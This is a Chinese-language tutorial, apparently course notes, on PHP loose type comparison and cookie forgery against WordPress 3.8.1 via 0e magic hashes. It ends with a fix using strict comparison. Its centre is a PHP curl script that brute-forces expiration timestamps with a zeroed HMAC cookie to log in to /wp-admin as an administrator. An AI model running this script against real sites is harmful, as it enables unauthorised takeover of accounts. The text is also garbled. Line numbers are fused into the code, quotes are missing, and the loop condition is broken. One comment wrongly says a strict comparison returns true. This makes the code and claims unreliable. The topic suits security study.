php弱类型：wordpress cookie伪造
1 php弱类型
php是弱类型语言，所以变量会因为使用场景的不同自动进行类型转换。php中用 == 以及 ！= 进行相等判断时，会自动进行类型转换，用 === 以及 ！== 进行判断时不会自动转换类型。
1 php2 $a = 3;3 $b = '3vic';4 var_dump($a == $b);//true5 var_dump($a != $b);//false6 var_dump($a === $b);//true7 var_dump($a !== $b);//false8 ?>
说明：在php中字符串转换成整型时，如果是数字开头就会转换成前面的数字（'3vic' -> 3），如果不是数字开头，那么就会转换成0（'vic' -> 0）
2 wordpress代码
wordpress 3.8.1 与 wordpress 3.8.2 部分代码区别1 php2 // wordpress 3.8.13 if ($hmac != $hash) {}4 // wordpress 3.8.25 if ( hash_hmac('md5', $hmac, $key) !== hash_hmac('md5', $hash, $key) ) {}6 ?>
cookie 组成客户端后台只验证其中的一条cookie，如下所示
wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; httponly
其中cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 格式为 wordpress_ + md5(siteurl)  其中siteurl为wordpress的网址，此处网站地址为http://www.test.ichunqiu,md5加密后为c47f4a97d0321c1980bb76fc00d1e78f，其它部分也可省。
类型用户名　过期时间登录成功服务器端赋予客户端的hash值
对应变量 $username $expiration $hmac
cookies admin 1433403595 cf50f3b50eed94dd0fdc3d3ea2c7bbb
分析验证登录代码 wp-includes/pluggable.php 第543-549行
1 php2 $key = wp_hash($username . $pass_frag . '|' . $expiration, $scheme);3 $hash = hash_hmac('md5', $username . '|' . $expiration, $key);4 if ( $hmac != $hash ) {5 do_action('auth_cookie_bad_hash', $cookie_elements);6 return false;7 }
在代码所使用的变量中，通过改变客户端cookie 的方式可控的有 $username 用户名，$expiration 有效期，又因为其中用户名是固定的，因此只有$expiration是可控的，所以我们可以从改变 $expiration 的方法来改变$hash。
结合php hash 比较缺陷分析 wordpress有以下几种可能使 $hmac == $hash 为真，字符串完全相等或者 $hmac 等于0的同时 $hash 为以字符开头的字符串; 将客户端的cookie中 $hmac 值改为0，然后在if ( $hmac != $hash ) {的上面一行写入var_dump($hmac);die();发现打印出来 $hmac 的结果是 string '0'而不是int 0， 那么有没有方法使字符串识别为整数呢，代码如下：
1 php2 var_dump('0' == '0e156464513131');//true
其中的 0e156464513131 会被识别为0乘以10的156464513131次方，还是得0；因此当 $hash 以0e开头后面全是数字时就会与 $hmac 的值为 '0' 时相等，所以我们可以将客户端的cookie设置为类似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 然后不断更新过期时间（现在1433403595的位置）的方法来碰撞服务器端，一旦 $hash 的值为0e开头后面全是数字即可验证通过。假设碰撞成功，就修改浏览器的cookie，直接访问后台地址，就可以成功登陆后台。
3 测试脚本
通过改变客户端cookie里过期时间的值，不断尝试登录后台，找出可以进入后台的时间戳，从而实现cookie伪造登录后台。
1 php 2 /* 3 4 本脚本用于wordpress 3.8.1 的cookie伪造漏洞检测 5 传入两个值 6 wordpress 的主页 $host 7 管理员用户名 $root 8 */ 9 header(content-type:text/html;charset=utf-8);10 11 $host = 'http://xxx.xxx.xxx';//主页地址 结尾不带'/'12 $root = 'user';//管理员用户名13 14 $url = $host.'/wp-admin/';//后台管理地址 15 $sitehash=md5($host); 16 17 echo \nwelcome\n\n;18 //通过时间戳暴力破解cookie 实现伪造cookie19 for($i=1500000000;$i$i++){20 $cookie = wordpress_.$sitehash.=.$root.|.$i.|0;;//组合构造cookie21 $header = array(22 content-type:application/x-www-form-urlencoded,23 'user-agent: mozilla/4.0 (compatible; msie .0; windows nt 6.1; trident/4.0; slcc2;)',24 cookie:.$cookie,25 );26 27 $curl = curl_init(); // 启动一个curl会话 28 curl_setopt($curl, curlopt_url, $url); // 要访问的地址29 curl_setopt($curl, curlopt_followlocation, 1); // 使用自动跳转 30 curl_setopt($curl, curlopt_autoreferer, 1); // 自动设置referer 31 curl_setopt($curl, curlopt_httpget, true); // 发送一个常规的post请求 32 curl_setopt($curl, curlopt_httpheader, $header); // 读取上面所储存的cookie信息 33 curl_setopt($curl, curlopt_returntransfer, 1); // 获取的信息以文件流的形式返回 34 curl_setopt($curl, curlopt_header, false);35 curl_setopt($curl, curlopt_header, 0); 36 curl_setopt($curl, curlopt_http_version, curl_http_version_1_0);//让curl自动选择版本37 $tmpinfo = curl_exec($curl); // 执行操作38 if (curl_errno($curl)) { 39 echo 'errno'.curl_error($curl); 40 } 41 curl_close($curl); // 关闭curl会话42 43 //匹配结果44 if(strstr($tmpinfo,'我们准备了几个链接供您开始')){45 echo \n.'success : '.$cookie.\n\n;46 break;47 }else{48 echo 'fail : '.$cookie.\n;49 }50 51 }52 ?>
说明：理论上32位的md5值以0e开头的大概三亿分之一，碰撞到可以利用的 $expiration 几率极低。
5 修复方案
php 中使用的哈希比较函数，将其中的 == ， ！= 分别更改为 === 和 ！== 或者 将比较的两个变量使用md5再加密一次。
学习笔记：http://ichunqiu.com/course/167